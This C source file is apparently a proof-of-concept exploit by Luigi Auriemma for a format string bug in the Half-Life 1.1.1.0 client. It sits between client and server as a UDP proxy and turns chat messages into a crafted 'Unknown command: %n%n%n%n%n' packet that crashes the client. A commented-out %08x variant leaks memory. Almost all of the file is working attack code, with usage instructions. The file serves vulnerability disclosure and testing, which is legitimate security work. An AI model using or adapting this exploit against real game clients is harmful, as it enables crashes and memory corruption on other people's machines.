/*

by Luigi Auriemma


192.168.0.3:27015 --> 192.168.0.2:27005
5a 00 00 80 a1 00 00 00 4d 1e 02 55 6e 6b 6e 6f   Z.....M..Unkno
77 6e 20 63 6f 6d 6d 61 6e 64 3a 20 25 6e 25 6e   wn.command:.%n%n
25 6e 25 6e 25 6e 0a 00                           %n%n%n..


Use -DWIN to compile the source on Windows

This source is covered by GNU/GPL

UNIX & WIN VERSION
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "hldec.h"
#include "hlenc.h"

#ifdef WIN
    #include <winsock.h>
    #include "winerr.h"

    #define    close    closesocket
    DWORD   tid1;
    HANDLE  thandle;
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <pthread.h>

    pthread_t tid1;
    int     thandle;
#endif






#define VER     "0.1"
#define PORT    27015
#define BUFFSZ  2048
#define INFOS   "\xff\xff\xff\xff" "infostring\n\0"
#define TIMEOUT 5







int                 sd1,
                    sd2,
                    plen;
struct    sockaddr_in    peer1,
                    peer2;







#ifdef WIN
    static DWORD WINAPI ctos(void *null);
#else
    static void *ctos(void *null);
#endif

void showinfostring(u_char *buff, int size);
void timeout(int sock);
u_long resolv(char *host);
void std_err(void);








int main(int argc, char *argv[]) {
    int         err;
    u_char      buff[BUFFSZ],
                *hlserver;
    u_short     hlport = PORT;


                /* STRING */

    u_char      fsbug[] = 
                "\x4d\x00\x02" "Unknown command: %n%n%n%n%n\n\0";
//              "\x4d\x00\x02" "Unknown command: %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n\0";
//               |   |   |      |
//               |   |   |      message
//               |   |   type of message
//               |   length of the message
//               type of data





    setbuf(stdout, NULL);

    fputs("\n"
        "Half-Life 1.1.1.0 client's \"Unknown command\" format string bug test "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\nUsage: %s <HL_server> [HL_server_port(default %d)]\n"
            "\n"
            "How to use:\n"
            "1) start your Half-Life server\n"
            "2) launch this tool specifying the server and the port if it is not the default\n"
            "3) from the same machine, or better from another, launch the Half-Life client\n"
            "4) when you will send a message from your client or from your server, the\n"
            "   program will send a formatted string (%%n%%n%%n%%n%%n) that crashes the client\n"
            "\n"
            "NOTE: the tests can be made also using ONLY one machine (client/server/PoC)\n"
            "NOTE: IT SUPPORTS ONLY ONE CLIENT AT TIME!\n"
            "\n", argv[0], PORT);
        exit(1);
    }


#ifdef WIN
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(2,0), &wsadata);
#endif



    hlserver = argv[1];
    if(argc > 2) hlport = atoi(argv[2]);


    fsbug[1] = sizeof(fsbug) - 3;




        /* 1 = client */
        /* 2 = server */

    sd1 = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd1 < 0) std_err();
    sd2 = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd2 < 0) std_err();


    peer1.sin_addr.s_addr = INADDR_ANY;         /* listen for client */
    peer1.sin_port        = htons(PORT);
    peer1.sin_family      = AF_INET;
    peer2.sin_addr.s_addr = resolv(hlserver);   /* connect to the HL server */
    peer2.sin_port        = htons(hlport);
    peer2.sin_family      = AF_INET;
    plen                  = sizeof(peer1);




       /* GET INFORMATIONS FROM THE SERVER */

    printf("\nChecking the remote Half-Life server %s:%hu\n",
        inet_ntoa(peer2.sin_addr),
        htons(peer2.sin_port));
    err = sendto(sd2, INFOS, sizeof(INFOS) - 1, 0, (struct sockaddr *)&peer2, plen);
    if(err < 0) std_err();
    timeout(sd2);
    err = recvfrom(sd2, buff, BUFFSZ, 0, (struct sockaddr *)&peer2, &plen);
    if(err < 0) std_err();
    buff[err] = 0x00;
    showinfostring(buff, err);




        /* BIND THE 27015 PORT */

    printf("\nBinding UDP port %u\n\n", PORT);
    err = bind(sd1, (struct sockaddr *)&peer1, plen);
    if(err < 0) std_err();




        /* CREATE THE THREAD THAT WILL CHECK THE DATA SENT BY THE CLIENT */

#ifdef WIN
    thandle = CreateThread(NULL, 0, ctos, 0, 0, &tid1);
    if(!thandle) {
#else
    thandle= pthread_create(&tid1, NULL, ctos, NULL);
    if(thandle != 0) {
#endif
        fputs("\nError: Cannot create the thread\n", stdout);
        exit(1);
    }




       /* CHECK THE DATA SENT BY THE SERVER */

    fputs("Server -> Client (active)\n", stdout);

    while(1) {
        err = recvfrom(sd2, buff, BUFFSZ, 0, (struct sockaddr *)&peer2, &plen);
        if(err < 0) std_err();


        if(memcmp(buff + 1, "\xff\xff\xff", 3)) {
            hldec(buff, err);



                    /***********************/
                    /*  FORMAT STRING BUG  */
                    /***********************/
                    // to activate it, you must simply send a message
                    // from the server or from the client (example: "say badass")
                    // 0x4c = say message

            if(buff[8] == 0x4c) {
                printf("Text: %s   Format string bug activated!\n", buff + 12);
                memcpy(buff + 8, fsbug, sizeof(fsbug) - 1);
                err = 8 + sizeof(fsbug) - 1;
            }



            hlenc(buff, err);
        }


        err = sendto(sd1, buff, err, 0, (struct sockaddr *)&peer1, plen);
        if(err < 0) std_err();
    }

    return(0);
}











#ifdef WIN
    static DWORD WINAPI ctos(void *null) {
#else
    static void *ctos(void *null) {
#endif

    int err;
    u_char  buff[BUFFSZ];


    fputs("Client -> Server (active)\n", stdout);

    while(1) {
        err = recvfrom(sd1, buff, BUFFSZ, 0, (struct sockaddr *)&peer1, &plen);
        if(err < 0) std_err();


        if(memcmp(buff + 1, "\xff\xff\xff", 3)) {
            hldec(buff, err);


            if(!memcmp(buff + 8, "\x03new\0", 5)) {
                printf("New client: %s:%hu\n",
                    inet_ntoa(peer1.sin_addr),
                    htons(peer1.sin_port));
            }


            hlenc(buff, err);
        }


        err = sendto(sd2, buff, err, 0, (struct sockaddr *)&peer2, plen);
        if(err < 0) std_err();
    }
    return(0);
}












void showinfostring(u_char *buff, int size) {
    int        nt = 1,
            len;
    u_char    *string;

    fputs("\n--------------------------------------------------\n", stdout);

    len = strlen(buff);
    if(len < size) buff += len + 1;

    while(1) {
        string = strchr(buff, '\\');
        if(!string) break;

        *string = 0x00;

        /* \n or \t */
        if(!nt) {
            printf("%s: ", buff);
            nt++;
        } else {
            printf("%s\n", buff);
            nt = 0;
        }
        buff = string + 1;
    }
    printf("%s\n\n", buff);
}












void timeout(int sock) {
    struct    timeval    timeout;
    fd_set    fd_read;
    int    err;


    timeout.tv_sec = TIMEOUT;
    timeout.tv_usec = 0;

    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &timeout);
    if(err < 0) std_err();
    if(!err) {
        fputs("\nError: Socket timeout, no answers received\n", stdout);
        exit(1);
    }
}








u_long resolv(char *host) {
    struct hostent *hp;
    u_long host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE)     {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            return 0;
        } else host_ip = *(u_long *)hp->h_addr;
    }

    return(host_ip);
}







#ifndef WIN
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif



